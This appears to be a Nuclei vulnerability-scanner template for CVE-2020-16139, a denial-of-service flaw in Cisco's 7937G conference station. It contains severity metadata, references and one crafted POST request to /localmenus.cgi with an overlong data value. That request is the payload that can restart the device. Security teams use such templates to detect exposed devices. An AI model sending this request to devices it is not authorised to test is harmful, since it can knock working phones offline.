id: CVE-2020-16139 info: name: Cisco Unified IP Conference Station 7937G - Denial-of-Service author: pikpikcu severity: high description: | Cisco Unified IP Conference Station 7937G 1-4-4-0 through 1-4-5-7 allows attackers to restart the device remotely via specially crafted packets that can cause a denial-of-service condition. Note: We cannot prove this vulnerability exists. Out of an abundance of caution, this CVE is being assigned to better serve our customers and ensure all who are still running this product understand that the product is end of life and should be removed or upgraded. impact: | An attacker can exploit this vulnerability to disrupt the functionality of the conference station, leading to a denial of service for legitimate users. remediation: | Apply the latest firmware update provided by Cisco to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/158819/Cisco-7937G-Denial-Of-Service.html - https://www.cisco.com/c/en/us/products/collateral/collaboration-endpoints/unified-ip-phone-7940g/end_of_life_notice_c51-729487.html - https://nvd.nist.gov/vuln/detail/CVE-2020-16139 - https://github.com/anonymous364872/Rapier_Tool - https://github.com/blacklanternsecurity/Cisco-7937G-PoCs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-16139 epss-score: 0.05724 epss-percentile: 0.93341 cpe: cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco product: unified_ip_conference_station_7937g_firmware tags: cve,cve2020,dos,cisco,packetstorm http: - raw: - | POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: header words: - "application/xml" - type: word words: - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - type: status status: - 200 # digest: 490a00463044022064bf3659fada478043467e0b827681d9b6c1d684ad21bd10712526371d22b0f00220432d723f568bb4b89fc6924e53d733834abb0727932f1f4fe54fcd3ac1db415a:922c64590222798bb761d5b6d8e72950